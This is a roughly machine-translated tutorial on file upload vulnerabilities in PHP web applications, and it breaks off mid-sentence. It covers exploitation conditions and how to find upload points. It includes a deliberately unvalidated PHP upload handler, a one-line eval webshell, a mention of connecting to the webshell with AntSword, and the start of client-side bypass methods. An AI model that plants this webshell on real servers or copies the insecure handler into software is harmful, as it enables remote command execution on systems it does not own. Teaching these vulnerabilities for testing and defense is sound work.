0x00 vulnerability Profile
File upload vulnerability refers users to upload an executable script file, and through this script file to obtain the ability to perform server-side command. This attack is the most direct and effective, "file upload" itself is no problem, the problem is that the file is uploaded, the server how to deal with, interpret the file. If the server processing logic of not doing enough security, it will lead to serious consequences.
0x01 vulnerability condition
Files can be uploaded
to know the path to the file upload
upload files can be accessed
uploaded files can be executed
0x02 mining ideas
Upload point upload all call the same class, direct global search function to upload
the black box to find upload points, positioning the code.
0x03 write a uploaded
Let's write a front-end upload
<html>
<head>
<meta charset="UTF-8">
<title>upload.html</title>
</head>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" name="上传文件">
<!--<input type="hidden" name="MAX_FILE_SIZE" name="4098">//设置文件上传大小,一般在php.ini里面设置-->
</form>
</body>
</html>
Write a php upload
<?php
$upload_dir = "D:\PHPSTUDY2018\PHPTutorial\WWW\upload";
if(isset($_FILES['file'])){
$upload_name = $upload_dir . "\\" . $_FILES['file'];
move_uploaded_file($_FILES['file']['tmp_name'],$upload_name);
echo "Type:" . $_FILES['file']['type']. "<br >";
echo "Size:" . ($_FILES['file']['size'] / 1024) . "<br >";
echo "Name:" . $_FILES['file']['name'];//这三行是我们看一下上传效果。
}else{
echo"上传失败";
}
Write a simple sentence
<?php
@eval($_POST['777'])
?>
Upload:
See uploaded successfully
After the ants take the sword connection on the line
this is one of the easiest most simple example, just let yourself start to change the direction of the white box. Slowly accumulate
0x04 bypass the file upload
1: The client detected by the detector bypass js
Detection principle
Whether the client to detect user-submitted legal documents through the javascript code
to bypass method
- Adding allowed to upload file types, so you want to upload type to meet the legitimate
2, remove the call to js validation script so that it can not do the detection of the uploaded file type, so as to bypass - through a review of the same element, view the contents of form form, the form of start tag is